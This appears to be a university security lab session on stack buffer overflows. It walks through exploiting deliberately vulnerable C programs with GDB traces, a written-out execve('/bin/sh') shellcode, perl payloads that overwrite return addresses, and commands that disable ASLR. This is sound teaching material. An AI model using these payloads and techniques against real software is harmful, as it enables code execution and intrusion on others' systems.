ESP: 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
EIP: 0x8048518 (: call 0x8048350 )
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048513 : push eax
0x8048514 : lea eax,[ebp-0x2c]
0x8048517 : push eax
=> 0x8048518 : call 0x8048350
0x804851d : add esp,0x10
0x8048520 : mov eax,DWORD PTR [ebp-0xc]
0x8048523 : call eax
0x8048525 : mov eax,0x0
Guessed arguments:
arg[0]: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
arg[1]: 0xffffd550 ('A' )
[------------------------------------stack-------------------------------------]
0000| 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
0004| 0xffffd294 --> 0xffffd550 ('A' )
0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0
0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d)
0016| 0xffffd2a0 --> 0x0
0020| 0xffffd2a4 --> 0xca0000
0024| 0xffffd2a8 --> 0x1
0028| 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x08048518 in main (argc=0x2, argv=0xffffd384) at vuln.c:22
22 strcpy(buffer, argv[1]);
gdb-peda$ x/32b buffer
0xffffd2ac: 0x21 0x83 0x04 0x08 0xeb 0xd4 0xff 0xff
0xffffd2b4: 0x2f 0x00 0x00 0x00 0x14 0x98 0x04 0x08
0xffffd2bc: 0x92 0x85 0x04 0x08 0x02 0x00 0x00 0x00
0xffffd2c4: 0x84 0xd3 0xff 0xff 0x90 0xd3 0xff 0xff
gdb-peda$ continue
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd2ac ('A' )
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd580 --> 0x58004141 ('AA')
EDX: 0xffffd2dc --> 0xf7004141
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 ("AAAAAA")
ESP: 0xffffd290 --> 0xffffd2ac ('A' )
EIP: 0x804851d (: add esp,0x10)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 : lea eax,[ebp-0x2c]
0x8048517 : push eax
0x8048518 : call 0x8048350
=> 0x804851d : add esp,0x10
0x8048520 : mov eax,DWORD PTR [ebp-0xc]
0x8048523 : call eax
0x8048525 : mov eax,0x0
0x804852a : mov ecx,DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd290 --> 0xffffd2ac ('A' )
0004| 0xffffd294 --> 0xffffd550 ('A' )
0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0
0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d)
0016| 0xffffd2a0 --> 0x0
0020| 0xffffd2a4 --> 0xca0000
0024| 0xffffd2a8 --> 0x1
0028| 0xffffd2ac ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 3, 0x0804851d in main (
argc=,
argc@entry=,
argv=,
argv@entry=) at vuln.c:22
22 strcpy(buffer, argv[1]);
gdb-peda$ x/32b buffer
0xffffd2ac: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2b4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2bc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2c4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
gdb-peda$ continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x41414141 ('AAAA')
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd580 --> 0x58004141 ('AA')
EDX: 0xffffd2dc --> 0xf7004141
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 ("AAAAAA")
ESP: 0xffffd29c --> 0x8048525 (: mov eax,0x0)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd29c --> 0x8048525 (: mov eax,0x0)
0004| 0xffffd2a0 --> 0x0
0008| 0xffffd2a4 --> 0xca0000
0012| 0xffffd2a8 --> 0x1
0016| 0xffffd2ac ('A' )
0020| 0xffffd2b0 ('A' )
0024| 0xffffd2b4 ('A' )
0028| 0xffffd2b8 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$
In the above GDB output we've used breakpoints to break right before and after the calling of the ''strcpy()'' function. We see that 50 bytes from the buffer address (using ''x/50b buffer'') are random before ''strcpy()'' and filled with ''A'' (''0x41'') afterward. From the GDB output we now know we overflow the buffer and also the ''func_ptr'' function pointer. We know we overwrite quite a bunch of stuff since we also overwrite the main() function arguments:
argc=,
argc@entry=,
argv=,
argv@entry=) at vuln.c:22
Of course, our aim is to do a carefully crafted to write ''func_ptr'' with exactly the value we want, that is the address of the ''shellcode'' global variable. In order to do that we need to precisely know where ''func_ptr'' is located with respect to ''buffer''. Let's assume that difference is ''d'' (''d = &func_ptr - &buffer''). Our goal would be to write in the buffer ''d'' bytes followed by the address of the ''shellcode'' variable. So we will provide a string of ''d+4'' length as the program argument.
Our steps for this to happen are:
- Find out the difference between ''func_ptr'' and ''buffer''. Let's call it ''d''.
- Find out the hexadecimal address of ''shellcode''.
- Create a byte string of ''d+4'' bytes consisting of ''d'' bytes of ''A'' (just a padding) and then the 4 bytes for the address of ''shellcode''.
In order to compute the difference between ''func_ptr'' and ''buffer'' we need to use dynamic analysis (GDB) as the two variables are stored on the stack:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ p &func_ptr
$1 = (void (**)(void)) 0xffffd2fc
gdb-peda$ p &buffer
$2 = (char (*)[32]) 0xffffd2dc
In the run above, the two variables are ''0xffffd2fc''' and ''0xffffd2dc''. It may be different on another run. The difference is ''0x20'' meaning ''32'':
$ python -c 'print 0xffffd2fc-0xffffd2dc'
32
Most of the time the system would have ASLR (//Address Space Layout Randomization//) enabled. This means that different runs of the same program would result in different placing of the stack and the addresses for the two variables (''func_ptr'' and ''buffer'') will differ. However the difference between the two addresses stays the same.
This was expected since the buffer stores 32 characters. However, this needn't always be the case and you need to make sure of that by (dynamic) analysis, such as the one we did with GDB.
So, ''d'' (the difference) is ''32''.
To find out the address of the ''shellcode'' variable we use static analysis, since the variable is global and stored in the
''.rodata'' section of the executable. We use ''nm'' for that:
$ nm vuln | grep shellcode
080485d0 r shellcode
So the address of ''shellcode'' that we aim to use to overwrite the ''func_ptr'' function pointer is ''0x080485d0''.
The address of the ''shellcode'' variable may differ from ''0x080485d0'' if the executable was obtained on another system with another compiler.
We now construct the ''d+4'' (''32+4=36'') byte string to feed as the first program argument. We use ''perl'' for that:
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAЅ
....
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"' | od -t x4
0000000 41414141 41414141 41414141 41414141
*
0000040 080485d0
We see that we are generating the proper byte string, filling the buffer with ''A'' characters and then using the 4 byte address of ''shellcode'' (''\xd0\x85\x04\x08'') to overwrite the ''func_ptr''.
Let's pass that string as the first argument using shell command substitution and profit:
$ ./vuln $(perl -e 'print "A"x32,"\xd0\x85\x04\x08"')
$
Excellent, we've got a shell! We've now got closer to what an attack really looks like, the trigger step happening with the help of a buffer overflow cause by the ''strcpy()'' function.
=== Task: Overwrite the function return address ===
Let's now get to the next step towards making the attack more realistic. We would rarely have the benefit of a function pointer (such as ''func_ptr'') being conveniently placed after a buffer in memory. What we usually aim to do is overwrite the function return address, point that to the shellcode (in our case the ''shellcode'' variable) and profit!
Inside the ''overwrite-return-address/'' subfolder in the tasks archive you will find a vulnerable source code file (''vuln.c''). This file has a buffer overflow vulnerability through the call of ''strcpy()'' inside the ''do_nothing_successfully()'' function.
Exploit this vulnerability by causing a buffer overflow of the ''buffer'' variable and overwriting the return address of the ''do_nothing_successfully()'' function to point to the shellcode (i.e. the address of the ''shellcode'' variable).
You need to find out the difference between the address where the function return address is stored and the address of the ''shellcode'' variable.
Use the ''$ebp+4'' construct in GDB to find out the address where the function return address is stored.
== Task: Use standard input to provide data ==
Passing information as a program argument is one of the way to provide input to the vulnerable program. Another way is through standard input. Let's use standard input to cause a buffer overflow and run the shellcode (again inside the ''shellcode'' variable).
Inside the ''use-standard-input/'' subfolder in the tasks archive you will find a vulnerable source code file (''vuln.c'') with a similar vulnerability to the one above: the use of ''strcpy()'' to cause a buffer overflow inside the ''do_nothing_successfully()'' function. There are several differences:
* the initial data is now read from standard input using ''fgets()''
* the buffer we are going to overwrite is now 70 characters long
* we've added an extra local variable before the buffer to make it a bit more challenging to determine the return address
Similarly to the task above, exploit the vulnerability by causing a buffer overflow of the ''buffer'' variable and overwriting the return address of the ''do_nothing_successfully()'' function to point to the shellcode (i.e. the address of the ''shellcode'' variable).
First determine the difference between the buffer start address and the address of the return address (both on the stack frame for ''do_nothing_successfully()''. GDB is probably the best way to do that.
Find out the address of the ''shellcode'' variable in the ''vuln'' executable. ''nm'' should be the simplest way to do that.
Create a payload to feed to the program consisting of ''d'' (the difference) bytes of ''A'' and then the address of the ''shellcode'' variable. Bear in mind we are using a little endian architecture.
To feed input to the program you may use something like
perl -e 'print "A"x50...' | ./vuln
However, this doesn't work. Even if the shellcode executes and a shell would be create the pipe is closed and so the standard input for the shell is closed. You can still check if it works with ''strace''.
The proper way to do this is with a command such as
cat <(perl -e 'print "A"x50...') - | ./vuln
The above command "concatenates" the output of the ''perl'' command with stadard input (''-''). After the output of the ''perl'' command is fed to the ''vuln'' program and a shell is created, the ''perl'' process closes, but the ''vuln'' program would continue getting information from standard input.
If everything, you will not get an expected prompt (''$'') but any command you provide to standard input will be run by the shell.
=== Task: Fill global variable with the shellcode ===
Now that we know how to cause a buffer overflow and trigger the execution of the shellcode, let's make another step into making things more realistic by injecting the shellcode into the program. Up until now the shellcode was conveniently stored in the ''shellcode'' variable, which is fairly unrealistic.
Inside the ''fill-global-variable/'' subfolder in the tasks archive we have the ''vuln.c'' program that we want to exploit. Our aim is to inject and store the shellcode in the ''resident_data'' global variable. The shellcode will be stored in the ''resident_data'' global variable, while the attack payload (consisting of the ''A'' byte padding and the address of the ''resident_data'' variable) will be stored in the ''input_buffer'' variable and the in the ''buffer'' variable; both are provided through standard input.
Similarly to the task above, exploit the vulnerability by injecting the ''shellcode'' through stadard input in the ''resident_data'' global variable, causing a buffer overflow of the ''buffer'' variable and overwriting the return address of the ''do_nothing_successfully()'' function to point to the shellcode (i.e. the address of the ''resident_data'' global variable).
Use the hints and start from the solution from the task above.
Use the shellcode that was stored in the ''shellcode'' variable in the above tasks. You may use ''echo'', ''python'' or ''perl'' to print it. It may be of help to store the shellcode in a file and feed input from that file.
When feeding the shellcode through standard input to the ''resident_data'' global variable, end it with a newline (''\n''). ''fgets()'' needs a newline to complete.
== Use the stack buffer for storing the shellcode ==
In the above task we were in luck that we had two buffers and both were filled by feeding input to the vulnerable program (in our case, through standard input). But that's not usually the case. Let's consider the situation where the ''resident_data'' buffer is not part of our program. Could an attack be possible? Yes, of course: we can use the ''input_buffer'' variable both for storing the shellcode and the payload for causing the buffer overflow. This data will then be copied to the ''buffer'' variable and we'll profit!
In the ''shellcode-in-stack-buffer/'' subfolder in the tasks archive the ''vuln.c'' program has the ''strcpy()''-based vulnerability identical to the above tasks but no "helper" buffer. We'll have to use the ''buffer'' variable both for storing the shellcode and the payload for causing the buffer overflow.
In short, we'll have to get to a situation where we overwrite the return address of ''do_nothing_successfully()'' function with the start address of the ''buffer'' variable, such that we'll execute code from the ''buffer'' variable. The contents of the ''buffer'' variable will start with the shellcode we've used so far. We'll feed that as input to the buffer.
The steps we are going to undertake are:
- Find out ''d'', the difference between the start of the buffer and the return address to know how to to trigger the buffer overflow. It should be identical to the one in the tasks above, but it's always good to be sure. We'll use GDB for this.
- Find out what is the address of the ''buffer'' variable on the stack. We'll use GDB for this as well.
- Create a payload that consists of the following:
- ''n'' bytes of shellcode (where ''n'' is the length of the shellcode)
- ''d-n'' bytes of ''A'' padding (where ''d'' is the above difference)
- ''4'' bytes storing the address of the buffer variable (on the stack)
- Store the payload in a file (we'll name it ''payload'') as it will be easier to inspect it afterwards.
- Feed the payload as standard input to the program using a construction such as
cat payload - | ./vuln
First of all, let's find out the difference between the ''buffer''' variable and address of the return address in the the ''do_nothing_successfully()'' function stack frame. We'll use GDB for that, get to the point before invoking ''strcpy()'' call (in the ''do_nothing_successfully()'' function) by using a breakpoint and then print the address of the ''buffer'' variable and the address where the return address is stored.
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ disass do_nothing_successfully
Dump of assembler code for function do_nothing_successfully:
0x0804847b <+0>: push ebp
0x0804847c <+1>: mov ebp,esp
0x0804847e <+3>: sub esp,0x58
0x08048481 <+6>: mov DWORD PTR [ebp-0xc],0x3
0x08048488 <+13>: sub esp,0x8
0x0804848b <+16>: push DWORD PTR [ebp+0x8]
0x0804848e <+19>: lea eax,[ebp-0x52]
0x08048491 <+22>: push eax
0x08048492 <+23>: call 0x8048350
0x08048497 <+28>: add esp,0x10
[...]
gdb-peda$ b *0x08048492
Breakpoint 2 at 0x8048492: file vuln.c, line 10.
gdb-peda$ continue
Continuing.
Provide input data: aaaa
[...]
Breakpoint 2, 0x08048492 in do_nothing_successfully (str=0xffffd280 "aaaa\n")
at vuln.c:10
10 strcpy(buffer, str);
gdb-peda$ p &buffer
$1 = (char (*)[70]) 0xffffd216
gdb-peda$ p $ebp+4
$2 = (void *) 0xffffd26c
gdb-peda$
In GDB we've printed the address of the local buffer variable and the address where the return address is stored (''$ebp+4''). These addresses may be different on your system. We'll compute the difference using Python:
$ python -c 'print 0xffffd26c-0xffffd216'
86
As before, the difference is ''86'' bytes. We need to create a payload of ''86+4'' bytes to overwrite the return address in the ''do_nothing_successfully()'' stack frame.
We already found out the address of the buffer variable as well: ''0xffffd216''. So we're ready to create our payload. As stated above the payload will consist of:
- ''n'' bytes of shellcode (where ''n'' is the length of the shellcode)
- ''d-n'' bytes of ''A'' padding (where ''d'' is the above difference)
- ''4'' bytes storing the address of the ''buffer'' variable (on the stack)
Our shellcode is the one we've already used. Let's find out its length:
$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' | wc -c
25
So our payload will consist of ''90'' bytes:
- ''25'' bytes of shellcode
- ''86-25 = 61'' bytes of ''A'' padding
- ''4'' bytes storing the address of the ''buffer'' variable (''\x16\xd2\xff\xff'')
Let's create the payload and store it in a file named ''payload'':
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x16\xd2\xff\xff\n"' > payload
$ wc -c payload
91 payload
$ xxd payload
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350 1.Ph//shh/bin..P
00000010: 5389 e131 d2b0 0bcd 8041 4141 4141 4141 S..1.....AAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050: 4141 4141 4141 16d2 ffff 0a AAAAAA.....
So the ''payload'' file now stores our payload and we can feed it to the vulnerable program.
We send the payload to the standard input of the ''vuln'' program:
$ cat payload - | ./vuln
ps
Segmentation fault
We get a segmentation fault, something went wrong. Let's check what caused the error, maybe we didn't properly construct they payload and jumped to a different address:
$ dmesg
[...]
[144777.383326] vuln[15245]: segfault at ffffd216 ip 00000000ffffd216 sp 00000000ffb71620 error 14
Nope. The address where segmentation fault occurred is OK; it's the buffer address ''0xffffd216''.
Let's investigate in GDB what happens by feeding the same data to the standard input of the ''vuln'' program:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ run < payload
Starting program: [...]/shellcode-in-stack-buffer/vuln < payload
process 26482 is executing new program: /bin/dash
[...]
This is weird. The exploit works under GDB. There must be something different between the two environments: running in GDB and without GDB.
There are actually two aspects:
- ASLR (//Address Space Layout Randomization//) is disabled in GDB versions starting with 7. See [[https://outflux.net/blog/archives/2010/07/03/gdb-turns-off-aslr/|this link]] for more information.
- The environment is different and because of that the address itself may be different GDB.
First of all we need to disable ASLR. We have two ways to do that:
- system-wide (administrative privileges are required):
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
- for a shell process only
$ linux32 -3 -R bash -l
If ASLR is enabled dynamic memory areas will be placed in different locations. We can use ''ldd'' to inspect the placing of library memory areas
$ ldd vuln
linux-gate.so.1 (0xf77a1000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75bd000)
/lib/ld-linux.so.2 (0xf77a4000)
$ ldd vuln
linux-gate.so.1 (0xf76e4000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7500000)
/lib/ld-linux.so.2 (0xf76e7000)
$ ldd vuln
linux-gate.so.1 (0xf77c9000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75e5000)
/lib/ld-linux.so.2 (0xf77cc000)
In the above situation ASLR is enabled as the addresses for library functions differs at each ''ldd'' run.
After we disable ASLR (using any of the above two methods), we can see that the addresses for library functions are identical for each ''ldd'' run:
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
If you want to check and enable ASLR in GDB you may use the commands below:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ show disable-randomization
Disabling randomization of debuggee's virtual address space is on.
gdb-peda$ set disable-randomization off
gdb-peda$ show disable-randomization
Disabling randomization of debuggee's virtual address space is off.
gdb-peda$ aslr
ASLR is ON
Let's now also use the same environment for GDB and for the program. In order to do that we need to clear the environment using the ''env'' command with the ''-i'' option that clears the environment. Let's run the program in GDB with the cleared environment:
$ env -i gdb -q ./vuln
Reading symbols from ./vuln...done.
(gdb) show env
LINES=23
COLUMNS=80
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) show env
(gdb) disass do_nothing_successfully
Dump of assembler code for function do_nothing_successfully:
0x0804847b <+0>: push %ebp
0x0804847c <+1>: mov %esp,%ebp
0x0804847e <+3>: sub $0x58,%esp
0x08048481 <+6>: movl $0x3,-0xc(%ebp)
0x08048488 <+13>: sub $0x8,%esp
0x0804848b <+16>: pushl 0x8(%ebp)
0x0804848e <+19>: lea -0x52(%ebp),%eax
0x08048491 <+22>: push %eax
0x08048492 <+23>: call 0x8048350
0x08048497 <+28>: add $0x10,%esp
0x0804849a <+31>: movzbl -0x52(%ebp),%eax
0x0804849e <+35>: mov %eax,%edx
0x080484a0 <+37>: sar $0x7,%dl
0x080484a3 <+40>: shr $0x5,%dl
0x080484a6 <+43>: add %edx,%eax
0x080484a8 <+45>: and $0x7,%eax
0x080484ab <+48>: sub %edx,%eax
0x080484ad <+50>: movsbl %al,%eax
0x080484b0 <+53>: cmp -0xc(%ebp),%eax
0x080484b3 <+56>: jne 0x80484b9
0x080484b5 <+58>: movb $0x61,-0x52(%ebp)
---Type to continue, or q to quit---
0x080484b9 <+62>: leave
0x080484ba <+63>: ret
End of assembler dump.
(gdb) b *0x08048492
Breakpoint 1 at 0x8048492: file vuln.c, line 10.
(gdb) run
Starting program: /home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/shellcode-in-stack-buffer/vuln
Provide input data: aaaa
Breakpoint 1, 0x08048492 in do_nothing_successfully (str=0xbffffcc0 "aaaa\n")
at vuln.c:10
10 strcpy(buffer, str);
(gdb) p &buffer
$1 = (char (*)[70]) 0xbffffc56
So we now have a different address for the ''buffer'' variable: ''0xbfffc56''.
Let's try using that address for the payload:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x56\xfc\xff\xbf\n"' > payload
$ cat payload - | env -i ./vuln
ps
Segmentation fault
$ dmesg
[150008.596439] vuln[2964]: segfault at 1 ip 00000000bffffc56 sp 00000000bffffdd0 error 6
Unfortunately it still doesn't work so we will try a different approach.
[[http://stackoverflow.com/a/17775966/4804196|This answer]] states that some updates to how you run the program under GDB or outside of it will work. However I didn't manage to make it work. The addresses are still different.
The approach I used make use of the dmesg message that shows us the stack pointer (''0xbffffdd0''). That is the stack pointer after the return address is read. So if we know the difference between the function return address and the buffer (''86'') we can make use of that to discover the buffer address. When an error occurs the stack pointer, the ''ret'' instruction had just been executed and the return address has been popped off the stack. So the stack pointer now points to the address right after the return address (4 bytes more than the difference between the function address and the buffer). So we have a ''86+4=90'' bytes difference between the value of the stack pointer in case of an error and the address of the buffer. We compute the address of the buffer according to that
$ python -c 'print hex(0xbffffdd0-90)'
0xbffffd76
We found out the buffer address: ''0xbffffd76''. Let's reconstruct the payload and test our vulnerable executable:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x76\xfd\xff\xbf\n"' > payload
$ cat payload - | env -i ./vuln
ps
PID TTY TIME CMD
2682 pts/1 00:00:01 bash
14783 pts/1 00:00:00 cat
14784 pts/1 00:00:00 sh
14796 pts/1 00:00:00 ps
19602 pts/1 00:00:08 bash
Yes, we've finally done it! We've found out the address of the ''buffer'' variable on the stack and used it to execute the shellcode.
Run the attack on the **same** terminal you used to generate the segmentation fault and find out the ''esp'' address. It's generally a very good idea to run the vulnerable program under ''env -i''.
=== Task: Use stack buffer for storing the shellcode on another program ===
Let's to a similar task as the one above. In the ''shellcode-in-stack-buffer-2/'' subfolder from the tasks archive there is a slightly updated vulnerable file. Use the same vulnerability as in the task above to obtain a shell.
=== Task: Buffer is too small: Use another buffer for storing the shellcode ===
It may so happen that the buffer we overflow is to small to store the entire payload (including the shellcode). In such a situation we can't store the shellcode and then do the overflow in the same buffer. Similar to one of the tasks above we used for storing the shellcode in a global variable.
In the ''small-stack-buffer/'' folder in the tasks archive you have a setup where the local ''buffer'' variable is only 20 bytes large, unable to store the entire payload. However you may use the ''input_buffer'' variable for storing the shellcode.
Make the attack and get a shell.
One of the nastiest aspects of this task is the way you create the payload. Think where you will store the shellcode when feeding it as standard input to the program. One of most troublesome thing is the possible overwriting of the ''input_buffer'' variable when using ''strcpy()''. Be careful!
=== Task: Buffer is too small: Use environment variable to store the shellcode ===
Let's make things a bit more challenging. Let's assume we have no room to store the shellcode in the local buffers.
In the ''shellcode-in-envvar/'' subfolder of the tasks archive both the ''input_buffer'' and the ''buffer'' variables are now ''28'' bytes wide and ''8'' bytes wide, respectively. We have no room to store the shellcode.
In this case we will can use another trick. We can define an environment variable, fill it with the shellcode, determine its address and overwrite the function return address with that address.
We recommend you create a file named ''shellcode_payload'' storing the shellcode. The contents of this file are to fill an environment variable.
Use the command bellow to define an environment variable and fill it with data:
export SHELLCODE=$(cat shellcode_payload)
In order to identify the address where this environment variable is stored, we recommend you add a padding prefix and look for that. For example, when creating the ''shellcode_payload'' file, use ''32'' ''A'' characters and then add the shellcode.
In GDB in order to find a string you may use:
gdb-peda$ find "AAAAAAAA" $esp $esp+1000
This above command means look for the ''%%"AAAAAAAA"%%'' string in the ''$esp, $esp+1000'' range (i.e. starting from the value of the ''esp'' register and ending ''1000'' bytes later).
You should also create an ''overflow_payload'' file for the actual attack, overflowing the ''buffer'' variable and rewriting the return address with that of the start of the shellcode.
In the end you would be able to run the attack through a command such as
cat overflow_payload - | SHELLCODE=$(cat shellcode_payload) ./vuln
== Extra: io.smashtestack.org ==
One of the most interesting and approachable security wargames is [[http://io.smashthestack.org/|io.smashthestack.org]]. It's highly recommended you go through as many tasks as possible.
For this session, we will use the 3rd and 5th tasks. They are found in the ''io.smashthestack.org/'' subfolder in the tasks archive.
Go through them, exploit them and profit (i.e. get a shell running).
You must disable ASLR for the tasks to go. You may do that using **either** of the two commands below:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ linux32 -3 -R bash -l
== Tasks ==
[[http://security.cs.pub.ro/hexcellents/res/shellcode-walkthrough-skel.zip|Shellcode Tasks]]
When running the vulnerable executables for the tasks below make sure you have disabled ASLR in your shell:
$ linux32 -3 -R bash -l
=== Call trampoline ===
Another way of working with strings is to declare them as data inside the shellcode. However, if you do this, you won't know their address at compile-time. You have to obtain the address at runtime by abusing the call instruction, like this:
jmp str
back:
pop ecx ; call pushes the return address on the stack, which in our case is precisely the string address
...
str:
call back
db 'Hello, world'
Write the shellcode that prints "Hello, world!" using this method.
=== Exploit with known buffer address ===
For the following tasks make sure your shellcodes don't have any null bytes
Switch to the //1-exact// directory.
You'll have to exploit the vulnerable binary found there and get a shell.
First, write a shellcode that runs execve("/bin/sh", ["sh", NULL], NULL). Use the template found in the //shellcode_template// directory. Run //make// to compile the shellcode and //make test// to compile the test executable.
The complete exploit will go into the //exploit.py// file.
==== Finding the buffer address ====
You'll first run the program under gdb and use it to inspect the addresses. You'll find the buffer address, then you'll use this address in the exploit.
For this to work, we have to assume that when you run the program the buffer address will be the same as the one you found with gdb. In general this is not true, but we can make it so by doing the following:
* you run the program using an absolute path, both when running normally and under gdb (so no "./vuln", but /path/to/vuln)
* you run the program with an empty environment, using ''env -i''
$ env -i /path/to/vuln
* when running under gdb you also run with an empty environment, by running "set exec-wrapper env -i" before executing the "run" command
=== Brute-forcing the buffer address ===
Switch to the //2-bruteforce// directory.
In this scenario we won't be using gdb to find the buffer address, since this method is very theoretical anyway. Instead we'll try every address in some range. To find out this range, we'll use a simple program that prints the value of its stack pointer.
You'll use the //exploit.py// script from the previous task for generating the payload. However, you'll have to modify it so that the return address won't be hardcoded in the script anymore, but taken as a parameter.
Then you have to edit the //run.sh// script to do the following:
*iterate over a range of values for the return address
*for each value use the exploit.py script to generate a payload
*run the vulnerable binary using that payload
==== Guessing a range of values for the return address ====
You'll do this using the //print_stack// executable. Keep in mind that you can't use the value you get from //print_stack// directly. There are a couple of facts you have to take into account:
*the //vuln// binary has the buffer on the stack. That translates into a "sub esp, something" instruction. You have to find this value and subtract it from the value you get from //print_stack//
*you're passing the payload as a paramter. This also causes the stack pointer to decrease. So make sure you also run //print_stack// with a parameter of the same length as the one you're passing to //vuln//
=== NOP sled ===
In order to minimize the number of tries required for a successful exploitation you'll use a NOP sled. Start from the //exploit.py// file from the previous task. You can also use //print_stack// to obtain a guess for the return address. In the end you should be able to run the exploit with a line like:
$ ./vuln "$(exploit.py 0xbfffXXXX)"
=== Environment variables ===
In this scenario the stack buffer is too small to hold the entire shellcode. To overcome this you'll have to place the shellcode in an environment variable. To increase the chance of succeeding you will also prepend the shellcode with NOPs, as much as the system will allow for an environment variable (around 128K).
The //shell.py// file will generate the shellcode to be placed in the environment var.
The //exploit.py// file will generate the actual exploit for the overflow.
This is how you run them:
export A="$(./shell.py)"
./vuln "$(./exploit.py 0xbfffXXXX)"
==== Finding the environment variable address ====
You still have to know what value to overwrite the return address with, that is, the address of the environment variable. To do this, you can write a small program that searches the variable in the environment and prints its address. Then you use the same address (or something around it) in your exploit, assuming that the environment is roughly the same when passed from the shell to its child processes.